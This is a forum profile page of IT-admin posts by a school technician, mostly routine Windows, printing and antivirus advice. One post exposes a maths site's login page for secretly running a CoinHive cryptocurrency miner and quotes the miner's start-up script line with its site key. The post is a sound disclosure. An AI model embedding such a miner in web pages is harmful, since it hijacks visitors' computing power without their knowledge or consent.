skell
Members-
Posts
585 -
Joined
Content Type
Forums
News
20th
EduGeek EDIT Conference
Blogs
Everything posted by skell
-
I'm now considering deploying a Chrome extension which will stop this behaviour. No Coin looks OK but allows users to whitelist sites. I'd rather they didn't get a choice for this.
-
Apologies if this is the wrong forum - mods, please move if appropriate. Method Maths seem to be employing a crypto miner on at least their login page https://methodmaths.com/login.html Here is the view source view Method Maths <br /> html, body { text-align: centre; position: absolute; left: 50%; margin: 0px -488px; background-color: #ffffff;}<br /> body { margin:0; padding:0; overflow:hidden; }<br /> #flashContent { width:100%; height:100%; }<br /> [b]var miner = new CoinHive.User('ZaECyHVdxhESEaLIPlGpwLWQEUXC47NU', 'Method',{threads: 2,throttle: 0.5});miner.start(); [/b] methodMathsLogo.png methodMathsSpacer.png Puffin-Web-Browser-For-pc.png Clear as day. I've blocked the domain via SmoothWall but I don't know if that will be enough yet.
-
I find that Windows 10 needs two reboots in order to pick up our WiFi settings. No idea why.
-
Yes, they need copying down or pointing to a location where they exist.
-
We switched from Sophos to ESET. ESET is great.
-
[1703, cu] Impero + GPO setting, request for someone else to test
skell replied to mrbios's topic in Windows 10
This fix was also given to me from Impero. Haven't had a chance to test it yet, however if it works its not an acceptable solution. EDIT: Tested and works. Keeping it on. Its fine, I misinterpreted what this setting does. -
Agreed. I've been working with Exchange since 2007, and each update just about wrecks me.
-
Try phoning. Email hasn't been the best for us.
-
Lumens is a leader in optical products - Download link to Ladibug software
-
Huh. We have Ladibug 3.05 installed on 1703 and its working fine. Have you tried downgrading? Or upgrading, if you are indeed on 2.08. Whats the difference?
-
We use PaperCut. It has a module called Mobility Print which works a treat. Never could get cloud printing working.
-
And in the darkness, charge them.
-
Also interested in this.
-
Printer Rentals or Leasing - What companys are there.
skell replied to newpersn's topic in General Chat
United Carlton here - can't fault them. -
I was like you once. I thought that scripts were "old hat" and "outdated" and "urg, scripts". I think you should give this one a try!
-
We use this method for Windows 10. Works a treat, cuts down logon times as well. https://www.atumvirt.com/2013/11/dramatically-reducing-logon-time-to-desktop-by-moving-from-group-policy-preferences-to-powershell-logon-script/
-
Make sure the packaged driver state in the print server is true. If it isn't you can hack the registry a bit to make them true.
-
Try removing the old address and adding it back after the new one.
-
Currently we put our XMLs on the sysvol drive and they're read from there. They are about 8Kb each, but I'm thinking of copying them down to the local machine and setting the GPO to reference them there instead. Any thoughts?
-
Google Mobile Management - 'Company Owned Devices'
skell replied to Scrambles's topic in Cloud Services
G-Suite for Education is different to G-Suite for Business. I was trying to do the same thing with some android tablets. What we're trying to do is business only. Made me sad. Then I forgot about it. Now I'm sad again. Thanks! -
@mullet_man In GPMC File > Options Delete Files Also, updating to the latest insider build seems to fix it.
-
[1703, cu] Upgrading from 1703 to 1709 after modifying wim
skell replied to skell's topic in Windows 10
Sorted! -
Will do tomorrow when I'm back at work.
